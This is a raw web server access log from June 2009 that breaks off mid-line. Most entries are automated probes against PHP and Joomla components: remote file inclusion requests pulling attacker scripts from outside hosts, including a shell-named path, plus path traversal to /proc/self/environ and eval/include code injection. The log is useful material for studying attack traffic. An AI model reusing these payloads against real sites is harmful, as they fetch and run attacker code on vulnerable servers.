216.17.99.13 - - [21/Jun/2009:08:50:05 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
200.234.201.114 - - [21/Jun/2009:08:50:09 -0400] "GET /logs/error_log.Q109050700/admin/classes/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
83.103.72.130 - - [21/Jun/2009:08:50:48 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:50:48 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:50:49 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:08:50:50 -0400] "GET /logs/error_log.Q108052600%20%20/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:08:51:10 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:08:51:14 -0400] "GET /logs/access_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:08:51:15 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:15 -0400] "GET //modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:15 -0400] "GET /logs//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:17 -0400] "GET /logs//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:17 -0400] "GET //modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:17 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:20 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:20 -0400] "GET //modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:08:51:20 -0400] "GET /logs//modules/errors.php?error=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
124.0.145.1 - - [21/Jun/2009:08:51:29 -0400] "GET /logs/error_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
203.241.231.63 - - [21/Jun/2009:08:51:35 -0400] "GET /logs/access_log.Q109061800/com_moofaq/includes/file_includer.php?gzip=0&file=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
83.103.72.130 - - [21/Jun/2009:08:52:49 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:22 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:22 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:22 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:28 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:28 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:28 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:40 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:47 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:47 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:47 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:53:48 -0400] "GET /logs/error_log.Q109051400%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:08:54:01 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
74.200.195.130 - - [21/Jun/2009:08:54:07 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:08:54:21 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
209.59.12.99 - - [21/Jun/2009:08:54:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [21/Jun/2009:08:54:30 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
195.34.78.110 - - [21/Jun/2009:08:55:49 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:08:55:49 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:08:55:49 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:08:55:53 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:55:55 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:08:56:26 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:57:02 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:57:11 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:57:11 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
88.191.89.138 - - [21/Jun/2009:08:58:29 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.813"
88.191.89.138 - - [21/Jun/2009:08:58:29 -0400] "GET /logs/access_log.Q109051100//include/print_category.php?setup[use_category]=1&dir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.813"
88.191.89.138 - - [21/Jun/2009:08:58:29 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.813"
91.121.172.134 - - [21/Jun/2009:08:58:34 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
91.121.172.134 - - [21/Jun/2009:08:58:34 -0400] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
91.121.172.134 - - [21/Jun/2009:08:58:35 -0400] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
91.121.172.134 - - [21/Jun/2009:08:58:40 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [21/Jun/2009:08:59:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.89.138 - - [21/Jun/2009:09:00:11 -0400] "GET /logs/access_log.Q109053000//include/print_category.php?setup[use_category]=1&dir=http://www.inboxstorage.nl/images/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.813"
124.0.145.1 - - [21/Jun/2009:09:00:19 -0400] "GET /logs/access_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:09:00:28 -0400] "GET /logs/error_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:09:00:53 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
76.12.17.218 - - [21/Jun/2009:09:00:59 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.822"
76.12.17.218 - - [21/Jun/2009:09:00:59 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.822"
76.12.17.218 - - [21/Jun/2009:09:00:59 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.822"
76.12.17.218 - - [21/Jun/2009:09:01:07 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 297 "-" "libwww-perl/5.822"
195.34.78.110 - - [21/Jun/2009:09:01:13 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:09:01:16 -0400] "GET //trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
66.249.71.54 - - [21/Jun/2009:09:02:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469362F50077EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.94.194.231 - - [21/Jun/2009:09:02:56 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:09:02:57 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:09:02:57 -0400] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
84.17.129.100 - - [21/Jun/2009:09:03:08 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:09:03:17 -0400] "GET /logs/access_log.Q109061000/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:09:03:40 -0400] "GET /logs/access_log.Q109052400//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
94.76.245.15 - - [21/Jun/2009:09:03:40 -0400] "GET //trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
94.76.245.15 - - [21/Jun/2009:09:03:40 -0400] "GET /logs//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
121.165.73.157 - - [21/Jun/2009:09:03:53 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:09:03:53 -0400] "GET /logs/access_log.Q109051100//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:09:03:53 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
94.76.245.15 - - [21/Jun/2009:09:03:57 -0400] "GET /logs/error_log.Q109052400//trans.php?trans=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
219.94.194.231 - - [21/Jun/2009:09:04:04 -0400] "GET /logs/access_log.Q109052900//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
209.59.12.99 - - [21/Jun/2009:09:04:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [21/Jun/2009:09:04:55 -0400] "GET /logs/access_log.Q109053000//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:09:06:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:09:06:21 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:09:06:21 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:06:23 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:06:23 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:06:23 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:09:06:39 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:09:06:43 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:07:08 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:09:07:09 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:09:07:13 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.248.150.52 - - [21/Jun/2009:09:07:16 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.248.150.52 - - [21/Jun/2009:09:07:17 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.150.52 - - [21/Jun/2009:09:07:17 -0400] "GET /logs/access_log.Q109051100%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:09:08:45 -0400] "GET /logs/access_log.Q109060800%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:09:09:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.150.52 - - [21/Jun/2009:09:10:28 -0400] "GET /logs/access_log.Q109053000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:10:54 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:10:54 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:10:55 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:09:11:04 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:09:12:49 -0400] "GET /logs/access_log.Q109051100//include/admin.lib.inc.php?site_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:09:12:49 -0400] "GET //include/admin.lib.inc.php?site_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
66.249.71.54 - - [21/Jun/2009:09:12:49 -0400] "GET /images/download_tut_1stg_lg.jpg HTTP/1.1" 200 19332 "-" "Googlebot-Image/1.0"
219.94.194.231 - - [21/Jun/2009:09:12:49 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
193.231.42.152 - - [21/Jun/2009:09:12:55 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.231.42.152 - - [21/Jun/2009:09:12:59 -0400] "GET //galeria.php?start=0&kategoria=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 210 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.103.72.130 - - [21/Jun/2009:09:13:27 -0400] "GET /logs/access_log.Q109060300%20%20//include/bbs.lib.inc.php?site_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
193.231.42.152 - - [21/Jun/2009:09:13:39 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 237 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
76.12.17.218 - - [21/Jun/2009:09:13:54 -0400] "GET /logs/access_log.Q109060800//trans.php?trans=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
76.12.17.218 - - [21/Jun/2009:09:13:54 -0400] "GET //trans.php?trans=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
76.12.17.218 - - [21/Jun/2009:09:13:54 -0400] "GET /logs//trans.php?trans=http://www.jigangdoyo.com/web_logs/iyoshells/MADONGCMD.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
121.165.73.157 - - [21/Jun/2009:09:13:56 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.reca